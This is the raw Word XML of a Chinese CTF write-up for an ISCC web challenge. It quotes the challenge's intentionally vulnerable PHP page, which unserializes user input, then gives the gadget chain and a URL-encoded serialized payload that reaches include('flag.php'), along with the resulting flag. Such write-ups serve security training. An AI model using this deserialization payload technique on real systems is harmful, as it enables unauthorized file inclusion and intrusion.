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1AEF4043" w14:textId="3BD310EF" w:rsidR="00AF064E" w:rsidRPr="00B25A25" w:rsidRDefault="00B25A25" w:rsidP="00AF064E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/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236F6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DFA74" w14:textId="6C997AF1" w:rsidR="00AF064E" w:rsidRDefault="00B25A25" w:rsidP="001043FF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>EB</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00C56EAE" w:rsidRPr="00C56EAE">
        <w:t>想犯大吴疆土吗</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="59DAD1A8" w:rsidR="00AF064E" w:rsidRDefault="00AF064E" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAA0EFF" w14:textId="286FBF2B" w:rsidR="00214038" w:rsidRPr="00214038" w:rsidRDefault="00214038" w:rsidP="00214038">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这届出题人成分复杂</w:t>
      </w:r>
      <w:r w:rsidRPr="00214038">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F65AE75" wp14:editId="3AE28CA8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3458058" cy="3467584"/>
            <wp:effectExtent l="0" t="0" r="952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CD944" w14:textId="2721F509" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从图片里找出喜欢的三件套后进行提交就会发现url里又box4参数=铁索连环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC22951" w14:textId="56EC3B74" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter-Regular" w:hAnsi="Inter-Regular"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>reward.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C11B7AF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&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC07DDA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if (!isset($_GET['xusheng'])) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A906C2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?&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14753657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&lt;html&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB276BA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&lt;head&gt;&lt;title&gt;Reward&lt;/title&gt;&lt;/head&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C81B695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&lt;body style="font-family:sans-serif;text-align:center;margin-top:15%;"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07463318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>&lt;h2&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>想直接拿奖励？</w:t>
      </w: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&lt;/h2&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B22E5B4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>&lt;h1&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>尔要试试我宝</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>⼑</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是否锋利吗？</w:t>
      </w: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&lt;/h1&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2F6E4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&lt;/body&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C567420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&lt;/html&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB1CDA8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&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2BA4A8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exit; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7858C055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lastRenderedPageBreak/>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD76E18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error_reporting(0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A77A3F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ini_set('display_errors', 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6209692C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?&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E14B639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&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F5824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// </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>犯</w:t>
      </w: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>flag.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>疆</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>⼟</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>者，盛必击</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>⽽</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>破之！</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B050FBB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class GuDingDao { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C394AAF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public $desheng; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF2D591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public function __construct() { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF80C24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$this-&gt;desheng = array(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6B391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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B53B07F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public function __get($yishi) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A6C46B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echo "__get"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1816C59C" w14:textId="17890C04" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Inter-Regular" w:eastAsia="宋体" w:hAnsi="Inter-Regular" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000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>$dingjv = $this-&gt;desheng;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68871801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$dingjv(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B0D2E1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>return "</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下次沙场相</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>⻅</w:t>
      </w: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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>徐某定不留情</w:t>
      </w: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"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1796C686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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4AD2C8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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6784FCCC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class TieSuoLianHuan { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E31C83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protected $yicheng; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC9B7D6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public function append($pojun) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579E7C76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echo "append"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76198E1C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echo $pojun; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6DC0CE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include($pojun); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A89C3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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD3B909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public function __invoke() { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546E54C7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echo "__invoke"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B72D36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$this-&gt;append($this-&gt;yicheng); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394E3F11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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D64FD6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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC1845A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class Jie_Xusheng { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FF7912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public $sha; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD44B20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public $jiu; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D53158B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public function __construct($secret = 'reward.php') { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376E4658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$this-&gt;sha = $secret; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D7770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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2BB284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public function __toString() { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796C5FF2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echo "__toString"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA9B9A1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return $this-&gt;jiu-&gt;sha; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034332EE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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440574FB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public function __wakeup() { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20659495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echo "__wake"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7401E8F9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lastRenderedPageBreak/>
        <w:t xml:space="preserve">if (preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this-&gt;sha)) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0853984A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>echo "</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>你休想偷看吴国机密</w:t>
      </w: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"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9EA361" w14:textId="36145B3B" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Inter-Regular" w:eastAsia="宋体" w:hAnsi="Inter-Regular" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000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>$this-&gt;sha = "reward.php";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E197EA4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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131C4315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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E462684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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24405E09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>echo '</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>你什么都没看到？那说明</w:t>
      </w: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>……</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>有东西你没看到</w:t>
      </w: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&lt;br&gt;'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54644F11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if (isset($_GET['xusheng'])) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A2A2D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@unserialize($_GET['xusheng']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D70C282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} else { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E2DDF9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$a = new Jie_Xusheng; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A9743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highlight_file(__FILE__); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739BE34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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FCC5AB" w14:textId="17433F38" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000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// </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>铸下这铁链，江东天险牢不可破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DD0EE7" w14:textId="0091794E" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E76074" w14:textId="326C280C" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A49147F" w14:textId="5C5080B1" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>反序列化，构造出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter-Regular" w:hAnsi="Inter-Regular"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1765F280" w14:textId="3D14D711" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638B745A" w14:textId="31CC3F84" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>链子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D563C95" w14:textId="77777777" w:rsidR="00C56EAE" w:rsidRPr="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C56EAE">
        <w:t xml:space="preserve">Jie_Xusheng的__wakeup -&gt; Jie_Xusheng的__toString -&gt; GuDingDao的__get -&gt; TieSuoLianHuan的__invoke -&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AD762F" w14:textId="665D7B7C" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C56EAE">
        <w:t>TieSuoLianHuan的append</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342CB6A6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O%3A11%3A%22Jie%5FXusheng%22%3A2%3A%7Bs%3A3%3A%22sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3267C291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a%22%3BO%3A11%3A%22Jie%5FXusheng%22%3A2%3A%7Bs%3A3% </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519FFA5C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3A%22sha%22%3Bs%3A10%3A%22reward%2Ephp%22%3Bs%3A3%3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0154726B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A%22jiu%22%3BO%3A9%3A%22GuDingDa0%22%3A1%3A%7Bs%3A </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB621EE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7%3A%22desheng%22%3BO%3A14%3A%22TieSuoLianHuan%22%3A </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A65266" w14:textId="77777777" w:rsidR="00C56EAE" w:rsidRPr="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr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 xml:space="preserve">1%3A%7Bs%3A10%3A%22%00%2A%00yicheng%22%3Bs%3A8%3A%22flag%2Ephp%22%3B%7D%7D%7Ds%3A3%3A%22jiu%22%3BN%3B%7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B572142" w14:textId="1FB40A0B" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C56EAE">
        <w:rPr>
          <w:rFonts w:ascii="Inter-Regular" w:eastAsia="宋体" w:hAnsi="Inter-Regular" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF9A749" w14:textId="18D67DCA" w:rsidR="00C56EAE" w:rsidRDefault="00C56EAE" w:rsidP="00C56EAE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56EAE">
        <w:t>ISCC{Wu_5hu@ng_W@n_Jun_Qv_5h0u}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79878D88" w14:textId="23B422E6" w:rsidR="00AF064E" w:rsidRPr="006D7CD7" w:rsidRDefault="00AF064E" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="006D7CD7">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A01A4B" w14:textId="77777777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FA954" w14:textId="77777777" w:rsidR="00583694" w:rsidRDefault="00583694" w:rsidP="005B605D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="575BA6F2" w14:textId="77777777" w:rsidR="00583694" w:rsidRDefault="00583694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-Regular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85D9B" w14:textId="77777777" w:rsidR="00583694" w:rsidRDefault="00583694" w:rsidP="005B605D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0763035F" w14:textId="77777777" w:rsidR="00583694" w:rsidRDefault="00583694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1043FF"/>
    <w:rsid w:val="001F595E"/>
    <w:rsid w:val="00214038"/>
    <w:rsid w:val="00236F6A"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="003F6770"/>
    <w:rsid w:val="004148F7"/>
    <w:rsid w:val="005457D8"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="00583694"/>
    <w:rsid w:val="005849AA"/>
    <w:rsid w:val="005B605D"/>
    <w:rsid w:val="005D1474"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="0084766E"/>
    <w:rsid w:val="008B58F1"/>
    <w:rsid w:val="00A14648"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00B25A25"/>
    <w:rsid w:val="00BB5292"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00C56EAE"/>
    <w:rsid w:val="00CD7DCC"/>
    <w:rsid w:val="00DA07F4"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00EA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paragraph" w:styleId="a8">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00C56EAE"/>
    <w:pPr>
      <w:widowControl w:val="0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4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5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9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6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4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9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8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2025-05-16T19:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>